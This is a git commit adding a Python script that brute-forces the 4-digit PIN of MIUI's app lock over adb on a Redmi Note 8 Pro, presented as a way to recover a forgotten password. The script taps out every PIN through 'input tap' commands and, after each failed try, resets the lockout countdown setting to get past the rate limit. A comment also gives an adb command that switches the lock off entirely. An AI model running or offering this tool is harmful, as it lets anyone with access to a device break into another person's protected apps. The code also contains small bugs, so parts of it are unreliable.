2025-05-29 14:49:43 +03:00 · 2021-06-22 22:49:18 +03:00 · 2021-06-22 22:49:18 +03:00 · 831d082e4f
commit 831d082e4f
1 changed files with 98 additions and 0 deletions
--- a/app_shield_bruteforce.py
+++ b/app_shield_bruteforce.py
@ -0,0 +1,98 @@
+import subprocess
+from time import sleep
+# from time import time
+
+"""
+This script bruteforce applock (aka Privacy Protection) feature in MIUI.
+!NO ROOT NEEDED!
+It can be useful if you forgot password
+If you wanna just get access to locked app then execute in adb shell:
+settings put secure access_control_lock_enabled 0
+But it doesn't give you access to applock settings.
+If you want to get access to that settings then you have to use this script
+-1. Some names may be inaccurate because I used Russian interface
+0. It works only with 4 numbers pin code
+0.1 It has been tested only with Redmi Note 8 pro, for others phone
+you may have to get screen coordinates of numbers in screen keyboard
+1. Open screen of app lock settings with pin code requirements (Settings -> App -> Apps protection)
+2. Run this script
+3. Wait
+
+Common algorithm of the script:
+1. Choose next pin to test (from range 0000 -> 9999)
+2. Enter it by using "input" command
+3. By using command "settings get secure applock_countDownTimer_deadline" find out if pin was correct. If was then exit from script
+4. Press back key by using "input" command
+5. Reset KD timer by "settings put secure applock_countDownTimer_deadline 0" command (that's why it all works)
+6. Enter into applock pin requirements screen
+7. Back to point 1
+
+Special thanks to 
+https://www.webcazine.com/19186/miui-what-to-do-if-youve-forgotten-your-privacy-protection-password/
+
+"""
+
+"""
+key x   y
+1   230 1525
+2   537 1534
+3   853 1502
+4   256 1723
+5   528 1737
+6   850 1761
+7   208 1870
+8   510 1917
+9   841 1904
+0   532 2100
+"""
+
+app_guard = [815, 1110]  # coords for app guard button
+
+
+def number2coords(number: int):
+    return {
+        1: [230, 1525],
+        2: [537, 1534],
+        3: [853, 1502],
+        4: [256, 1723],
+        5: [528, 1737],
+        6: [850, 1761],
+        7: [208, 1870],
+        8: [510, 1917],
+        9: [841, 1904],
+        0: [532, 2100]}.get(number)
+
+
+def exec_adb_shell(command: str):
+    print(f"$ {command}")
+    command = command.split()
+    process = subprocess.run(['adb ', 'shell', *command], capture_output=True)
+    if process.returncode != 0:
+        print(f"returncode {command.returncode}")
+        print(f"command: {command}")
+        exit()
+    return process.stdout
+
+
+for i in range(0, 10000):
+    # time1 = time()
+    i = '{:d}'.format(i).zfill(4)  # convert 0 -> 0000
+
+    print(f'Trying {i}')
+
+    for number in str(i):
+        coords = number2coords(int(number))
+        command = f'input tap {coords[0]} {coords[1]}'
+        exec_adb_shell(command)
+
+    if exec_adb_shell('settings get secure applock_countDownTimer_deadline') == b'0\r\n':
+        print(f"I found code: {i}")
+        break
+
+    exec_adb_shell('input keyevent 4')  # back key
+    sleep(0.1)
+    exec_adb_shell('settings put secure applock_countDownTimer_deadline 0')  # reset kd timer
+    exec_adb_shell(f'input tap {app_guard[0]} {app_guard[1]}')  # open app guard back
+    sleep(0.1)
+    # print(f"Iteration took {time()-time1}s")
+    # print("End of loop")